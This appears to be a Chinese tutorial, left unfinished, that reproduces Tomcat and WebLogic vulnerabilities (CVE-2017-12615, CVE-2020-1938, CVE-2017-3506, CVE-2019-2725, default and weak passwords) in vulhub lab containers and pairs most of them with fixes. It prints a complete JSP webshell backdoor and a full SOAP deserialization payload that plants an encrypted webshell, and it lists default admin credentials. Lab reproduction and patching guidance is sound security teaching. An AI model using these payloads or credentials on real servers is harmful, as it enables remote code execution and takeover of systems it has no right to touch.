常见中间件漏洞大全及其修复方法（未完成）

一.Tomcat

tomcat 是一个开源而且免费的 jsp 服务器，默认端口 : 8080 ，属于轻量级应用服务器。它可以实现 JavaWeb程序的装载，是配置 JSP （ Java Server Page ）和 JAVA 系统必备的一款环境。

1.1 CVE-2017-12615

Tomcat put方法任意文件写入漏洞

当 Tomcat 运行在 Windows 操作系统时，且启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为false ），攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP文件，JSP 文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

漏洞复现

首先我们自己用docker的vulhub搭建一个tomcat环境，默认是8080端口，命令如下

cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d

访问后进入如下页面

开启抓包后刷新一下这个页面，然后在数据包中将请求方式改为PUT，并在/后面加上要上传的文件名+/，然后在数据包最后一行空一行，填入上传文件的内容，这里我上传了一个1.jsp文件，内容是jsp的一句话木马（到网上搜的），修改完成后点击放行

然后继续到浏览器中访问并用蚁剑连接

如何修复

设置 readonly 为 true

1.2后台弱口令部署war包

在tomcat8环境下默认进入后台的密码为 tomcat/tomcat，未修改造成未授权即可进入后台，或者管理员把密码设置成弱口令。

漏洞复现

首先我们去利用docker搭建一个vulhub环境，命令如下

cd /etc/vunhub/tomcat/tomcat8
docker-compose up -d

我们去访问页面，点击manager app后会弹出一个登录框让我们登录，这里是一个弱口令（如果没设置过），账号和密码都是tomcat

登陆进去后往下滑，这里有一个上传文件的地方，可以上传war包

然后我们就去制作一个war包，首先创建一个jsp文件，内容为之前找到的jsp一句话木马

然后将其压缩，并将后缀名改为war，保存后上传

上传成功后即可看到我们上传的文件

点击访问后会弹出404，但是再加一个1.jsp目录，即可正常访问

然后用蚁剑连接成功

如何修复

1. 设置强口令： conf/tomcat-users.xml

<user username="tomcat" password="tomcat" roles="manager

gui,manager • script,manager-jmx,manager-status,admin-gui,admin-script" />

2. 删除 manger 文件

1.3CVE-2020-1938

由于 Tomcat AJP 协议设计上的缺陷，攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有Webapp目录下的任意文件，从而可以读取webapp 配置文件或源码文件。此外如果目标应用有文件上传的功能情况下，配合为文件包含漏洞利用GetShell 。

漏洞复现

tomcat默认的conf/server.xml中配置了2个Connector，一个为 8080 的对外提供的HTTP协议端口另外一个就是默认的 8009 AJP协议端口，两个端口默认均监听在外网ip。

搭建环境命令如下

cd etc/vulhub/tomcat/CVE-2020-1938
docker-compose up -d

然后我们还需要下载一个漏洞利用的poc包，下载到kali中，链接为

https://github.com/0nise/CVE-2020-1938

打开后有如下几个文件，我们利用如下语句对目标进行poc，就可以任意查看文件内容

python CVE-2020-1938.py -p 8009 -f 目录文件名 IP

如何修复

1.更新到最新版本
2.关闭AJP服务，修改Tomcat配置文件Service.xml,注释掉。<Connectorport="8009"protocol="AJP/1.3" redirectPort="8443" />

3.配置ajp配置中的secretRequired跟secret属性来限制认证。

二.WebLogic

WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

2.1后台弱口令GetShell

通过弱口令进入后台界面，上传部署war包，getshell

漏洞复现

首先搭建环境，命令如下

cd vulhub-master/weblogic/weak_password
docker-compose up -d

然后访问目标的/console/login/LoginForm.jsp 目录进入一个登陆界面，这里的默认账号密码是：weblogic/Oracle@123，我们直接登录

如果出现如下页面，点击主页即可成功登录

然后在主页中点击部署里的安装，然后就可以上传文件了

我们直接上传一个之前制作的war包，jsp木马压缩成zip，修改后缀为war，上传

上传完成后访问我们名为1的war包下的1.jsp文件，成功访问

然后用蚁剑连接

漏洞修复

修改密码为复杂密码

2.2 CVE-2017-3506反序列化漏洞

Weblogic 的 WLS Security 组件对外提供了 webserver 服务，其中使用了 XMLDecoder 来解析用户输入的XML数据，在解析过程中出现反序列化漏洞，可导致任意命令执行。

漏洞复现

搭建环境命令如下，与2.1中用的环境相同

cd vulhub-master/weblogic/weak_password
docker-compose up -d

访问以下目录中的一种，如果有回显如下图，则可以判断 wls-wsat 组件存在

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

然后这里可以利用抓包然后添加请求包，在标签之间分别写存放 jsp 的路径和要写入的 shell来获取shell，也可以直接利用工具，我这里利用工具，在地址中填写目标url然后点击检查即可检测漏洞

此处检测出有漏洞后，点击文件上传，将我们之前搜到的jsp一句话木马复制粘贴上去，然后点击上传文件

一句话木马如下

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

显示上传完成后，在工具下方会显示上传文件的路径，我们直接去访问

发现成功访问后用蚁剑连接

漏洞修复

更新到最新版本，打上 10271 的补丁 , 对访问 wls-wsat 的资源进行访问控制

2.3 CVE-2019-2725

wls9-async 等组件为 WebLogic Server 提供异步通讯服务，默认应用于 WebLogic 部分版本。由于该 WAR 包在反序列化处理输入信息时存在缺陷，攻击者通过发送精心构造的恶意 HTTP 请求，即可获得目标服务器的权限，在未授权的情况下远程执行命令。

漏洞复现

搭建环境命令如下（与前面一样）

cd vulhub-master/weblogic/weak_password
docker-compose up -d

搭建完成后访问 /_async/AsyncResponseService 目录，出现如下页面则访问成功，存在漏洞

然后开启抓包，再次访问此页面，先右键将请求方法get改为post

写入shell如下，然后放包

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header>
<wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext
xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131"
class="java.beans.xmlDecoder"><object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/
webshell.jsp</string><void method="println"><string><![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U
extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST"))
{String k="e45e329feb5d925b";session.putValue("u",k);Cipher
c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new
U(this.getClass().getClassLoader()).g(c.doFinal(new
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta
nce().equals(pageContext);}%>]]>
</string></void><void method="close"/></object></java></work:WorkContext>
</soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
</soapenv:Envelope>